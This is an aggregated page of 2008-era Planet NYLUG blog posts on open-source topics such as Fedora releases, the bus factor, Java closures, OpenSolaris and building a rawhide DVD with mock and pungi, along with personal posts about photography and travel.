Planet NYLUG

Leslie Hawthorne posted an interested thread to the Google Summer of Code Student's List regarding the Bus Factor and the related Single point of failure.It presents a large problem in FOSS development.

She posed the following questions:

1) Do you see the bus factor as a problem in Open Source in general?
How about for your project?

2) Do you think that the bottlenecks result from having too few people
involved in a project? How do those bottlenecks get resolved if it is
hard to bring on newcomers due to bottlenecks?

3) What parallels can you draw between the concept of the bus factor,
socially speaking, and reliability engineering?

The best example of how it is a problem in open source can be explained by the saga of Hans Reiser, whom everybody knows killed his wife. He is the lead developer on ReiserFS. Now with him in prison, there is a good chance that ReiserFS will now slowly die due to his incarceration.

Imagine for a moment if you will, that Linus Torvalds got hit by a bus or something related to that. What would happen to the Linux Kernel? Well, it would probably not die, but it would be a HUGE hit since he is the one who leads the development. Would it die? Probably not. The Bus Factor for linux is pretty low.

As for my Summer of Code project, the Bus Factor would be high. Since I am the primary developer.

Applying this socially, every organization is ultimately led by the vision of one person, and usually there are safeties in place to prevent the Bus Factor from even becoming an issue. So this really can't be applied socially in my opinion. BUT if Google were eliminated, Summer of Code would cease to exist. So I suppose it could be applied.

The success and potential failure is usually dependent on one person (or a select few in some cases). Again, referencing Hans Reiser, his project will now most likely fail, may not; but the probability is high. This is the same across all industries.

Now, does anybody else have answers regarding this topic?

As some of you may know by now (or may not), a new wiki is coming to the Fedora project! Our previous wiki, MoinMoin, has been pretty unreliable due to scalability issues. We were the largest deployment of Moin, and it just didn't scale. You may have noticed this in the form of slow response, frequent timeouts, internal server errors, and other assorted bad things.

Good news being, we‘ve got a replacement now - we're going to the tried and true, battle tested MediaWiki. There is a conversion script for Moin that was available, and was modified by Mike McGrath to fit our needs. Máirín Duffy anad Ian Weller did all the template work, and I just sat back and made sure everything I was interested in rendered correctly :).

Now the time has come for everyone else to see that things have rendered OK. There are a few known issues with this incarnation:

1) The license tag at the bottom says CC-BY-SA, this is not correct, we are not relicensing the content. This will be correct soonish.
2) Where the Art team did banners for various projects, those are replaced by HTML at this point. Those will have to be manual conversions to MediaWiki templates. We can no longer allow embedded HTML in the wiki (it had been on the table for some time to remove the capability, there are inherent security issues in it).

Without further ado, you can testdrive the new wiki here. This is going live soon, like 2-3 weeks soon, so get your feedback in!

As I write this entry, I am on an intercity train going from Tilburg to Utrecht after a 3 hr meeting. Coming back to my home country after having been away for a while, I always forget how beautiful the country really is. Large open spaces, lots of green, a lot of water and pretty scenery. I have been pretty much up for 29 hours (only slept for 3 hrs or so) and feel fairly jet lagged. Readers who do the West-East crossing regularly can probably identify with how I feel at this point :)

Anyhow; I am in The Netherlands to attend the 2008 SURFnet customer relationship event and I will be presenting the work we are doing on AIRT. AIRT is a web-based platform distributed under the GNU General Public License that aims to assist computer security incident response teams with the bureaucratic aspects of their work. AIRT's goal is to minimize the work on incident administration through automation, allowing handlers to focus on the work that really matters.

What does this have to do with Security through obscurity? Absolutely nothing, but since I was writing a blog entry, I might as well throw in a shameless plug for a project on which I spend a considerable amount of time ;).
The topic of this post is to once more drive the point home that security through obscurity does not work. Most information security professionals know this, but do not really live it. I try to have as little of my security work confidential; most of the controls that we put in place are easy to detect by scanning anyway. Even if we do practice near-full-disclosure, the bad guy will still want to verify that what we are saying is correct and he will scan us just for the heck of it. Of course, our security controls should detect that and we should determine our reaction to the scans before they take place.

What brought this topic on?

Having moved to the United States from Europe (The Netherlands, to be exact; look it up), we have a fairly large collection of DVD's that are now useless. DVD's have a region encoding that prohibits discs authored for one region from being played in a player meant for another region. Presumably the content owner did this to be able to segment the market with different pricing schemes and release schedules. However, the scheme was cooked up before the ubiquity of the Internet and the realization that DRM does not really provide as much value as many people think.

Most DVD players are region-specific by a setting in their software, and through manipulating that software, the region can be changed. Many players will allow you to select your region once, and prohibit you from changing it after the initial choice.

We recently bought a $40 DVD player that was rumored to be region free. In other words, the manufacturer of that DVD player configured it in such a way that it would play DVDs for all regions. Unfortunately, the particular model that we purchased was region 1 locked (the USA is in region 1). Browsing the internet, we found many unlock codes for other model players by the same manufacturer, but nothing worked.

Eventually, I decided to just email the manufacturer's customer services address and ask them how I could change the region code. After all, I already have "No", so it can only get better form that point on.

Much to my surprise, I got an almost immediate response with detailed instructions how to change the region encoding of our new player. We can now play all our Dutch-spoken DVDs, which is important to us, since we are raising our daughter with two languages.

This manufacturer understood a number of very important lessons:
1. the world is flat. People (consumers!) move around all the time; arbitrarily assigning regions to people is rude, inconsiderate, and flawed.
2. consumers are demanding. As a consumer, I don't care about why or how. I want something that works when I need it (Availability!) Assigning region codes to discs and players impedes with perceived availability of the content I legally purchased.
3. consumers are willing to pay for content. Provided that the content is of sufficient quality and reasonably priced, products will sell. Protecting content via DRM-techniques is a feeble attempt to prevent market efficiency. It might work in the short run, but it is not sustainable indefinitely.

If you are interested in more details, please contact me.

Well, I'm being forced against my will by a customer at $DAYJOB to install Oracle Enterprise Linux for them. So I downloaded it, installed it at home this evening, just to kick the tires a little bit before installing for real. So I installed it. The first thing I notice is that Anaconda looks a tad shoddy compared to the real deal. For instance, when installing packages, there's a 'Status:' line at the bottom that's always blank. What is it supposed to tell me the status OF? That wasn't present in the real deal IIRC.

Next, it installs. I login, and find this:

[jstanley@dhcp-137 ~]$ cat /etc/redhat-release
Enterprise Linux Enterprise Linux Server release 5.1 (Carthage)
[jstanley@dhcp-137 ~]$

For something so 'in your face', I'd expect Oracle to be ashamed of themselves. They just seemed to have replaced 'Red Hat' with 'Enterprise Linux' without regard to whether or not it made any sort of sense. Same throughout the installer, really, except they just replaced Red Hat with nothing.

This really seems like quite a shoddy product to me. I've always thought so, and now that I've seen for myself, I KNOW so.

Oh, and by the way - this was the 100th post to this blog. What a pitiful thing to waste it on.

Fedora 9 is now officially released! You can get the bits, via BitTorrent or via direct download, at http://fedoraproject.org/get-fedora

Some of the features that I'm most excited about:

• Xorg 1.5
• FreeIPA
• Anaconda encryption of the root filesystem
• Improved NetworkManager
• KDE4
• Gnome 2.22
• Live persistence
• New GDM
• Preupgrade
• Partition resizing via anaconda
• Upstart
• And perhaps most importantly, Firefox 3!

Thanks to all the developers, QA, bug triage, art, marketing, websites, documentation, and other numerous groups that made this release happen!

Mauricio is a coworker and a friend who is moving to another department within the same company. This move not only requires him to change the way he works but where he works since he has to relocate to the US. This is his last week here in Costa Rica and we wanted to say farewell to our pal and what better way to do it than over a couple of beers with close friends.

I hope that he has success in his new position and that he doesn’t forget his friends. Have a safe trip

The rest of the photos can be viewed by clicking here.

Click more to see a slide show of the photos taken during the party.

Created with Admarket’s flickrSLiDR.

-LM

Figured that I would post here what I posted to fedora-devel-announce a few days ago:

As mentioned previously in various announcements about the Bugzilla actions that are being undertaken, we will begin phase 2 shortly. Instructions on how to opt-out of these changes are below, as well as links to wiki pages that contain precise information on when the actions will begin, what actions are to be taken, and the queries used to select bugs to act upon.

1) Close all bugs INSUFFICIENT_DATA that are still in NEEDINFO from the "stale rawhide" cleanup (http://fedoraproject.org/wiki/BugZappers/F9CleanUp/RunTime#stalephase2). Precautions are being taken to ensure that bugs had activity, however were never taken out of NEEDINFO from the last round of actions are not touched.

OPT-OUT: Changing the status to any other than NEEDINFO.will avoid having the bugs touched,

2) Close all bugs in ANY state that are filed against an EOL version (http://fedoraproject.org/wiki/BugZappers/F9CleanUp/RunTime#eolphase2)

OPT-OUT: Changing the version to '8' or 'rawhide' will avoid us making any changes to this bug.

Note that the following two actions are part of the BugZappers release SOP, and are being undertaken independently of the activities above (and will take place for every subsequent release to ensure that Bugzilla remains in good working order and useful to all parties):

3) Rebase all rawhide bugs (except for those that are Package Reviews or RFE's) to Fedora 9. Note that Bugzilla notification mail will be suppressed for this change - i.e. no one will receive mail that this has occurred except for this one. This is in direct response to community feedback that we were spamming them with unnecessary notifications. (http://fedoraproject.org/wiki/BugZappers/HouseKeeping/Fedora9#frebase)

OPT-OUT: If this is an RFE, then add the FutureFeature keyword to the bug, and no action will be taken on it.

4) Post a warning about the impending end-of-life of Fedora 7 in all bugs filed against F7 (http://fedoraproject.org/wiki/BugZappers/HouseKeeping/Fedora9#f7warning). Paul Frields recently mentioned this, this comment will merely act as a reminder and final warning of this fact. 30 days from the date of this running, all remaining bugs that are opened against Fedora 7 will be CLOSED WONTFIX.

No opt-out really applies to this, however, if the bug still applies to a later release, feel free to change the version to the later release and the comment will not be changed

If you have many bugs to change as a result of these procedures, feel free to drop by #fedora-qa and we will guide you through changing them all at once.

Also note that we have conducted a thorough post-mortem investigation of all the spam that was generated last time, and have identified and repaired the problem. There will be only one notification per bug this time around :).

Rest assured the BugZappers are are not doing this on their own and this process has been carefully reviewed the leadership of the Fedora Community. If you believe this process should be changed, like all things in Fedora, feel free to propose patches to the existing process or create a new proposal which can be evaluated and discussed for the Fedora 10 release cycle.

Well, I declared my candidacy on f-a-b earlier, and just yesterday made it official (I guess) with a post on the wiki. So if you can't think of someone better to select, select me! :) There's a number of reasons to do so that are outlined on the wiki page. If someone can suggest patches for that nomination, that's welcome too.

So, to continue on with my playing w/ java closures, I now present Swing event handling: BGGA Style. Again, to compile this you will need the BGGA prototype. You can run it using your installed jre.

First, i'll show you the java version:

import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JTextField;
import javax.swing.JButton;
import javax.swing.SwingUtilities;
import java.awt.event.ActionListener;
import java.awt.event.ActionEvent;

/**
 * Created: Mar 19, 2008 5:48:43 PM
 *
 * @author Robert O'Connor
 */
public class UsualJavaGui {
    JFrame frame = new JFrame("Usual Java Example");
    JButton button = new JButton("Press me");

    public UsualJavaGui() {
        button.addActionListener(new ActionListener() {
            public void actionPerformed(ActionEvent e) {
                System.out.println("Button pressed");
            }
        });
        frame.add(button);
        frame.pack();
        frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
        frame.setVisible(true);

    }

    public static void main(String[] args) {

        SwingUtilities.invokeLater(new Runnable() {
            public void run() {
                new UsualJavaGui();
            }
        });

    }
}

I think you get the gist of what it does. Now the BGGA version.

import javax.swing.JFrame;
import javax.swing.JButton;
import javax.swing.SwingUtilities;
import java.awt.event.ActionEvent;

/**
 * Created: Mar 19, 2008 7:35:15 PM
 *
 * @author Robert O'Connor
 */
public class BGGAGui {
    JFrame frame = new JFrame("BGGA Frame");
    JButton button = new JButton("Press me");

    public BGGAGui() {
        button.addActionListener({ActionEvent evt => System.out.println("Button pressed");});
        frame.add(button);
        frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
        frame.pack();
        frame.setVisible(true);
    }

    public static void main(String[] args) {
        // thanks to neil gafter!
        SwingUtilities.invokeLater({ => new BGGAGui(); }); 

    }
}

What occurs within the the addActionListener() is that when you click the button, that closure is invoked; it does the same thing the java one does (print "Button pressed" to the screen). I'm not sure how to write the invokeLater() method using BGGA to reduce its verbosity. If anybody knows, could you tell me? When the code is executed; the closure is executed and a frame is displayed; yadda yadda.

The other day in the bookstore I was leafing through a book, and it made the argument that Free/Open Source software was very good at creating (possibly better) copies of existing programs, but wasn't good at breaking new ground.

Personally, I think this argument is stupid. While Tim Berners-Lee's first WWW browser wasn't released under a "free" license, but it wasn't really closed-source either: His announcement said: "If you're interested in using the code, mail me. It's very prototype, but available by anonymous FTP from info.cern.ch. It's copyright CERN but free distribution and use is not normally a problem.", and the (later dominant) NCSA Mosaic was released under an open source/free license. Web servers were similarly free, and honestly, nobody has ever even caught up to Apache and the other free web servers in terms of quality. Netnews was mostly run on free software, as was much of the internet (much of that code from Berkley). Clearly that was innovation.

CVS (the version control system) was open-source, and was incredibly innovative, and there's been incredible amounts of innovation in that realm by open-source projects. Cfengine (the system management tool) was pretty innovative. Perl. Python. Ruby. Rails. PHP. In games we have nethack/rogue etc (which went on to inspire the creation of Diablo), as well as the many MUDs.

So why do people have this absurd notion that Free Software can't innovate? I can think of a couple reasons. The main one is that FOSS development is greatly affected by communication costs. The simpler sharing your source code is, the easier a distributed development model is. Thus, the amount of Free Software written, and the ease of the Open Source Software development model shot up enormously along with the growth of the internet. So anything that pre-dates the internet wasn't going to be developed as Free Software. So yes, Free spreadsheets/WYSIWYG wordprocessors/etc. are fairly derivative. Proprietary software had a substantial head start. But in internet technologies (especially on the server side) Free software has the lead, since you had the internet available to collaborate over if you were writing an internet server.

I suspect proprietary development also allows more rapid development of mid-sized software, so Netscape got all the fame for the Web, because it was able to step in at the right time and make a better browser than Mosaic quickly. But that doesn't mean it's any more innovative.

And, of course, people think it because it's what Microsoft tells them to think ;)

Yesterday, I broke down and ordered a Thinkpad R61. I had originally planned to go with the T61, but I did some research, and found that really the only difference between the two (I got the 14.1" R61) is that the T61 is slightly thinner and lighter (but not by a huge margin). Both have the LCD roll cage (NOTE: the 15.4" R61 does NOT have the LCD roll cage, whereas the 14.1" model does), they're both built like tanks to withstand my abuse, and it's about $150-$200 cheaper than the T61. The total price of the machine after all the discounts was $958.15, not a bad machine for the price. Yes, I know that Centrino 2 is coming out next month. Having the absolute latest and greatest is not really important to me (except in the operating system realm :) ), and I think I''ll really enjoy it and it will last awhile I'm sure. Of course, the included Vista goes bye-bye quickly and gets replaced with F9 :)

So here's what I got (note the 5/22/08 over there, that's the estimated ship date :( ):

1	7732CT	CONFIGURED SYSTEM	05/22/08	$958.15	$958.15
	42X5952	SBB INTEL CORE2DUO PROC. T9300
	42V8012	VBB MS WIN VISTA HOME BASIC
	42W7293	SBB MSWINVISTA H-BAS32 US ENG
	42V9324	SBB 14.1WXGA +TFT,W/OCAM
	42X5956	SBB INTLGMA X3100 GM965W/1394
	41W2068	VBB 4GB PC2-5300 667MHZ 2DIMM
	42V8195	SBB KEYBOARD US ENGLISH
	42W7033	SBB ULTRANAV(TRCKP+TOUCHP) +FINGR
	42V8712	SBB 100GB HDD,7200RPM
	42V8718	SBB DVDREC.8XMAXDUAL L.ULT.ENH
	42V8177	SBB INT.WIRE.WIFI/LINK4965AGN
	42V9338	SBB 6 CELL LI-ION BATERRY
	41W1787	SBB CPK NORTH AMERICA
	42W7087	SBB LP,US ENGLISH

What you ask? How am I writing on the blog if I'm liquidating all my assets in order to pay off debts? Not that kind of bankrupt, silly! I'm going to declare laundry bankruptcy this weekend.

I have nothing but a small stackable washer and dryer in my apartment, so doing all of the laundry that has accumulated that doesn't absolutely have to be done is going to take weeks if I were to undertake the entire endeavor.

What, exactly, is a laundry bankruptcy and how does one declare such a thing? Fortunately, there are no costly lawyers involved, nor is your credit tarnished for 7 years. Rather, one feels better immediately after declaring laundry bankruptcy. You know that you're a candidate for laundry bankruptcy when the mountain of laundry in your apartment is taller than you are (no, not really my case, but you get the point). So how does one declare laundry bankruptcy?

The procedures may vary slightly, depending on where you live. The gist of it, though, is a trip to the local laundromat. You can either do the laundry yourself there, or, for a fee, they will generally do the laundry for you and you can pick it up later. After all, is doing umpteen loads of laundry really worth my time and effort? I don't really think so.

After all this is done, I'll probably have enough clean clothes for a year! :)

Maybe I only notice these things because Gerv has so religiously run the "n00,000 Bugzilla bug"-contests...

Or maybe it was randomly running across Wil's post about all of the web team's commits the other day...

Or maybe... it's just because I'm a dork about these sorts of things...

... buuut I was amused to realize the other day that here at the nest, we're due to hit the 10k mark on both bugs (I just filed bug 9087) and commits (changeset 9200 just went in).

I'm betting we'll probably hit 10k on both before 0.6 ships... although, I find myself wondering who will make it across the milestone first. Even though Bugzilla is behind at this point, I'm betting it'll catch up to commits before we ship.

Anyone bets on when we'll hit 20k?

(I was going to ask about the next-order-of-magnitude milestone, but... a Wilson party is probably a couple years away... at least.)

For the last few days, I have been thinking about doing a series of blog posts around the theme Essential Truths in  Information Security. In these posts, I will discuss a number of lessons that I learned while working in information security.

Today's truth is: Understand what you protect. For an information security professional to be successful, just understanding how to protect a resource is not enough. A deeper understanding of your organization's assets is at least as import: what are the resources that you are trying to protect? How important are those resources to the organization? What kind of controls are appropriate?

Understanding what you protect requires knowledge about the business side of life. After all, information security is not a goal; it is a means to manage risks to information and to ensure that those risks are at an acceptable level. Who decides what is acceptable and what is not? Most certainly it is not the information security professional; our job is to identify risks and point out what the consequences might be if a risk manifests itself.

We will also suggest how those risks may be mitigated, but in the end, that decision is not up to us. Once the decision has been made, we will work to implement, operate, and monitor information security controls to see how effective they are. More often than not, information security professionals will also coordinate how information security incidents are resolved.

Determining what measures will be taken while responding to an incident is something that we need help of "the business" for. They, not us, know what the impact of containment or eradication actions are.

Understand what you protect

Realize that putting information security controls in place is not a goal, but a means to achieve a business goal. Understand what you protect.

I’ve never been a big fan of Photoshop and the whole modify a photo after taking the shot, this because it really doesn’t make you a good photographer if you’re always fixing up your mistakes after taking the shot instead of working at getting better with getting the shot, but I find that there is always…ok sometimes…a way to enhance the colors of the photo so that it pops out and doesn’t have a washed out look.

I recently got the Totally Rad Actions for Adobe Photoshop, as well as the Kubota’s actions which I’ve mentioned before, and using them didn’t really caused much change or enhancement to the photo which made me think that the actions didn’t really apply to my photos but I later found out that I was actually implementing them wrong and once I got the hang of it I was able to actually enhance the photos and make the colors pop. The bad side of this is that it takes time and patience on photos that have a lot of details. The photo below, which I took from the second floor of my house with my Panasonic Lumix DMC-LZ3, and the first shot doesn’t have the colors popping out and look a bit washed out:

Once I learned to use the actions correctly I applied the “Technicolor Dream World” and after taking the necessary actions I proceeded to apply the “Big Blue” action and also took the necessary steps to activate the action correctly. Once that was done I ended up with the shot below:

The shot looks a lot better and the colors really pop out. What are your opinions and views on the subject?

-LM

I have spent the last few days at the EDUCAUSE/Internet2 Security Professionals Conference. Of all the conferences that I have attended over the years, this might have been the best. Not only were the logistics very well taken care of (I did not detect many problems), the sessions that I attended were relevant, interesting, and of an acceptable quality.

In addition, I was able to put a face to many of the names that I have seen in the past year, and I have enjoyed it a lot. Attending the conference was definitely worth my time (and my employer's money). Well done, EDUCAUSE!

The first official binary distribution based on OpenSolaris was released yesterday! It comes on a single LiveCD that lets you check out all the much talked about features before installing. Some of the highlights are the new IPS package manager, DTrace, Service Management Facility, XEN, and the new ZFS filesystem!

I have been looking forward to experimenting with Zones and ZFS (after being very disappointed with the current ZFS implementation on FreeBSD) more. I have downloaded the LiveCD and got ready for the painful Solaris installation. To my surprise the LiveCD booted to a very attractive GNOME desktop with a GTK2 installer comparable to desktop oriented Linux distribution. The installation was quick and painless, it completely blew me away. I highly recommend OpenSolaris to anybody interested in exploring ZFS!

• OpenSolaris.com
• Planet OpenSolaris
• Free OpenSolaris CD from Sun
• ZFS presentation from Sun Tech Days

I had taken these photos some time ago and just found them last night on my cellphone so I uploaded them for everyone to see

I really like how they came out…what do you think?

Natalie posted on Digital Photography School or DPS the last post on the three part series to get the DPS community or anyone else that’s interested blogging to show off their photography work. On this last post she asked a couple of the professional photographers about their blogs and where they host them, I guess her e-mail asking me about it got lost in all the spam…no I’m just kidding

You can find her article on the Digital Photography School website and you can go to her blog as well and link from there.

As far as what I do is pretty simple…well at least for me…I bought a hosting plan with DreamHost which is pretty cheap compared to other options I’ve seen out there and has really nice specs as far as the package they offer. I installed Wordpress using their one click install system and upgrade the blog through there as well. The theme I use on Wordpress is K2 which I love and have done a couple of modifications to it so that it does what I need.

For my photos I actually upload them to Flickr, I got the pro account after I hit the 200 photo limit that they have established, and then I installed a plugin called FAlbum on Wordpress so that the visitors to my site can see my photos directly from my blog and not have to go to Flickr, though they can still go to Flickr and comment on the photos there and also download bigger versions of the photos if they wanted to.

My e-mail is actually administered by Google. I got an account on their Google Apps service and they provide the e-mail system which is the same one they use for gmail so I can even chat with my friends who use google talk. I love this option though the free version allows me to have up to 25 e-mail addresses but it’s ok since I really have my girlfriend and myself using it

I will often just blog directly from Flickr, what I like about this is that it will organize the photo on the top right hand corner and wrap the text around the photo, or sometimes I will blog from Wordpress and add the medium sized photo to the post and clicking on it will take you to the Flickr page though I might change it in the future so that it stays on my blog and doesn’t go directly to Flickr.

The monitor calibration can turn out to be a problem and I’ve noticed this since I’ve seen the photos from my desktop at home, which I’ve attempted to calibrate my monitor as best as possible, from my work computer, which has not been calibrated at all, and from my mom’s computer which I had to play a little with the color correction on the nVidia control panel in order to get the images to look like they should though I’m still not completely happy with that.

I guess the biggest issue for digital photography is the monitor calibration and this is a big factor that affects the way others see our photos. As of right now I’m really happy with the setup I have and find it quite affordable for my budget. I have even done a similar setup for my sister, she’s no photographer, but she likes to draw and would like to show off her work as well so I’ve set it up and you can check it out on her blog that I made…I still have to teach her to upload to Flickr.

What would I change? Well so far not much really…though I’d like to add a drop shadow to the photos on the FAlbum that works well with the current theme I have set and that would be pretty much about it right now.

Pascal Wowak said that he believes that watermarks on the images ruin the images and I have to agree with him up to certain level. There are people who simply don’t want anyone else to use their work so they put this huge watermark across the photo which it sure protects it and also ruins the photo a lot. Then there are people who make a very good looking watermark, like Melissa Jill, which looks so artistic. The watermark I use is a simple small black line on the bottom of my photos and the idea I took from my friend ocnarfid

I also like the idea of having a border added to the image which basically has the signature like the one from Jasmine Star since it’s non-intrusive on the photo but I find it that, at least for myself, it would add a lot of work.

I also just post the finished work and not some raw photo which I haven’t even taken a look at. I like to do little to no retouch to the photo unless I consider that it would really come out great with certain effects applied. Most of the time I’ll just make the photo into a black and white photo or just leave it in color.

-LM

I've noticed something while reading my daily blogs, a lot of code is just unreadable because most blog systems (blogger looking at you), screw up indentation, unless you wrap it in a pre tag (opening and closing are both required. This makes it readable for your readers! I've left comments on the blogs that didn't know this, and now they do.

This message is primarily for the Google Summer of Code students, but is useful to the programming community as a whole. When you post code, wrap it in a pre tag and be sure to close them when your code example is complete.

This past Sunday I went to I.D.T. Paintball with my coworkers and some friends of theirs to play a good game of paintball. It was sunny, hot and dry which caused for me to get a sun burn on my hands and the back of my neck but it sure was worth it since we had a great time.

I didn’t take my camera because I like to play paintball a lot so I knew that I wouldn’t take photos but a friend took his Nikon D40 to take some shots and I took the time to give it a test run and get some shots. I really like the one of Venny, a coworker, that I took which you can see at the end of this post. This was taken during our lunch break that we took. We bought meat at the supermarket beforehand to grill during our lunch break.

Afterwards we took it to the go-kart tracks to run around a few times. At the end of the day we were so tired that we all decided to go home.

-LM

Alright, well maybe not profit, but certainly fun!

I had mentioned in a previous post about doing QA for Fedora, and having installation CD and DVD sets available prior to the general release of the distribution. All that Fedora Alpha, Beta, and Preview Release really is are just snapshots of the daily development tree of Fedora, rawhide. Sometimes, it might be useful to have a DVD, similar to what Fedora release engineering would produce, of the current rawhide. Now, I'm going to give a step-by-step of how to do this in 'mock', which is a program that you can use to manage chroot's. Mostly, it's used for building binary RPM's from source RPM's, however, it has grown functionality that make it useful for doing composes recently.

There are some things that pungi does that depend upon several things that make it very suitable to be run in a mock chroot. First, the distribution that you are composing and the distribution that you are composing on have to be the same, For instance, if you wish to compose rawhide, you have to be running rawhide (or at least have rawhide userspace). Also, the architecture that you are composing on and the arch that you are composing must be identical (you can't compose i386 on an x86_64 system, for example). Mock allows us to overcome both of these limitations (at least for compatible arches - i.e. x86_64 and i386). A mock chroot can have userspace that is very different from the host system, and so long as the arches are compatible, they can even be of a different arch (i.e. you can run i386 code on x86_64, but not the other way around, obviously).

The only thing that we have to do on the system that is going to produce the trees is to install the 'mock' rpm. This is as simple as typing 'yum install mock' at the command line. On my system, I also prefer to have the bash-completion package installed, because mock is 'completable' by that package, and the buildroot names can get kinda long sometimes (or am I just lazy?) :). After this is done, you need to make sure that the user that needs to use mock is in the 'mock' group. This is because being able to use mock is equivalent to having root on the machine in question, since mock is SUID (and has to be), You can accomplish this with 'gpasswd -a jstanley mock' for example.

The next thing that we need to do is initialize the chroot. This is very simply done by using 'mock -r (config) --init'. This brings up the question of which mock configuration to use. Mock comes with a number of pre-made configuration files. The ones that you're most likely to want to use 'fedora-rawhide-i386' or 'fedora-rawhide-x86_64'. These files live in /etc/mock, and the -r argument to mock takes them WITHOUT the trailing .cfg extension. If this is your first time running mock for this installroot, it will use yum to install the group 'buildsys-build' into the chroot. After that is done, it will tar up the root, and save it for future use. If you had used this installroot before, it would clean it (i.e. delete everything that was there), untar the root cache, and then run yum update to get items that were changed since the root cache was created.

Now we have a chroot with the desired content in it, we can install pungi. Wait a minute, this is in a chroot (and yum is not installed by default in this chroot), so how do I do that? Good thing mock has the '--install' option. So you just execute 'mock -r fedora-rawhide-x86_64 --install pungi', It won't output much at all, but it will install pungi and it's chain of dependencies. Now that we have pungi installed, we're ready to actually use it in the chroot! So let's get a shell in the chroot with 'mock -r --shell', which will give you the following output:

[jstanley@rugrat ~]$ mock -r fedora-rawhide-x86_64 --shell
INFO: mock.py version 0.9.7 starting...
State Changed: init plugins
State Changed: start
State Changed: lock buildroot
mock-chroot>

The 'mock-chroot>' is my shell prompt, reminding me that I am in the chroot. From here, we can use pungi. The reference kickstart files that release engineering uses to create the releases are included in the fedora-release package, and can be found in the /usr/share/fedora-release directory. The traditional DVD configuration, which is what you want to use, is called f9-fedora.ks (note that this just landed in the fedora-release package on Friday). One piece of housekeeping that needs to be done at this point in to remove the generated rpm database files. If you are building on your native arch, this isn't strictly necessary but still a good idea. If you are building i386 images on x86_64, not doing this is fatal.

mock-chroot> rm -f /var/lib/rpm/__db.00*

At this point, we can execute the pungi command:

mock-chroot> pungi -c /usr/share/fedora-release/f9-fedora.ks --destdir=/compose --nosplitmedia --nosource

I'll take you through what these options do:

-c - what kickstart file do you want to use to use for this compose

--destdir= - where should the compose happen. It's important to note that this is different from where on the non-chroot'ed filesystem you'll find it - remember that we're operating in a chroot here.

--nosplitmedia - I do not wish to generate split (CD-sized) media for this compose

--nosource - I don't want to gather source code for this compose. Note that you MUST NOT use this option if you plan on distributing the resulting discs. Note that by eliminaiting this option alone, source ISO's will not be created, that's an additional step that I'll mention below.

When you enter this command, pungi will go about four phases of operation:

- Gather the RPM's and SRPM's as required
- Create a yum repo out of those
- Run the anaconda 'buildinstall' tool to generate installation images, etc
- Create ISO's

Using a local mirror and a reasonably fast computer, this will take about 30 minutes. Note that every RPM that would be included on the DVD is downloaded, so having a local mirror REALLY helps here. Not a show-stopper if you don't have one, but it will take longer than 30 minutes :). One word of warning, though - when the compose gets to the point of running buildinstall, it will look like it's hung - this is the longest part of the compose. So if you see something like this and nothing more on your screen, it will finish:

Pungi.Pungi:INFO: Running /usr/lib/anaconda-runtime/buildinstall --product Fedora --version 20080503 --release "Fedora 20080503" --bugurl http://bugzilla.redhat.com /compose/20080503/x86_64/os

OK, so eventually, you'll see the following (among other things):

Pungi.Pungi:INFO: Running /usr/bin/sha1sum Fedora-20080503-x86_64-DVD.iso
Pungi.Pungi:INFO: Running /usr/bin/sha1sum Fedora-20080503-x86_64-netinst.iso
Pungi.Pungi:INFO: CreateIsos is done.
All done!

At this point, the DVD and netinst.iso have been created, and are inside of our chroot. To get at the chroot from the non-chroot'ed OS, it's located in /var/lib/mock/fedora-development-$YOURARCH/root - so everything that you did is located there. You can find the completed ISO's in /var/lib/mock/fedora-development-x86_64/root/compose/20080503/x86_64/iso for example.

I said earler that source ISO's are not created by default as part of the Create ISO's stage. In order to create the ISO's, you need to run pungi again against the same tree. Here's the syntax for doing that:

mock-chroot> pungi -c /usr/share/fedora-release/f9-fedora.ks --destdir=/compose --sourceisos --nosplitmedia

Again, eliminate the --nosplitmedia option if you want CD-sized ISO's created as well.

Originally uploaded by tenshi_cr

So, i read that groovy released 1.6-beta-1. They kept the mixins syntax that was added. I love the new syntax, it's easy to use, and concise as well.

Congrats to the Groovy team! Great Job!

I read Kees’ post on the whole traveling and I must agree with him because it’s quite a hassle to travel through the US airports nowadays and even worst if what I heard over at Digg is true. I heard that FBI is copying some hard drives of passengers who carry laptops.

Before you go and beat me about believing everything I see on Digg, whether this is true or not, I’m sure going to keep this in mind next time I’m traveling to the US. I’ve traveled into the US a couple of times with my laptop and having to take out the laptop on every security check is enough of a hassle for me and even worst if they want to copy the contents of my hard drive.

I agree on the traveling light…but that’s too light for me…besides all of this trouble one has to go through in the airports I’d still carry my laptop. I want to get one of those Asus eeePCs to just have access to the Internet and to my home network and I’m all set no need to carry anything else besides that…well with the exception of my clothing of course

-LM

I am heading off to the EDUCAUSE/Internet2 security professionals conference this weekend. The event starts Sunday and completes Tuesday around noon. While getting my packing list checked off (business cards, itinerary, confirmations, reservations, schedule, etc) I was getting ready to pack my laptop, power supply, cable lock, external drive, etc.

Then I stopped.

Why would I carry all this stuff?

I consider myself an experienced traveler and I have visited a fair number of conferences all over the world. Traveling is annoying enough; I do not need anything that is non-essential.

After all; what I do not carry, I cannot lose. True, having access to email would be nice (I'm not on Crackberries). and web browsing would convenient too, but face it: I am in session Sunday from 8.30am-late (hopefully there will be some good BoF sessions), Monday starts even earlier (7am) and might end even later, and Tuesday I'll be checking out of the hotel and traveling back home. When would I even have time to get my e-fix?

Traveling in general, and navigating public transportation (incl. clearing airports) is much easier without carrying a lot of stuff.

So; what will I be taking in addition to some fresh clothes? A stack of business cards, my cell phone (with charger), my notepad and one pen.

I want something a GUI in which I can write and run MySQL queries. For anything more than trivial work, the MySQL CLI client just doesn't cut it. A way to check out table structure in a graphical way would be nice, too.

I'm not a MySQL expert by any stretch of the imagination, so maybe there's something that I should Just Know About(TM), or is MySQL lacking such a basic tool?

This is my attempt at some long exposure photography. This shot was taken from the parking lot of Pricesmart in Heredia, CR. The city that you see the lights coming from is San Jose, the capital of Costa Rica.
I took this one using my 70-300mm lens since it has the lens hood. The first try of this shot was done with my 18-55mm lens but there was a strong light coming from a street light near by that ruined the shot.
I’m not a huge fan of post-processing but I did run this photo through a couple of actions in Adobe Photoshop CS3.
Any comments in regards to the photo are welcomed. Personally I think I should have either set the shutter speed to a faster time, lowered the ISO speed or lowered the aperture a bit since I do see some color, specially from the lights, that bled, for example if you pay close attention there are some lights that have a blueish halo around them.

-LM

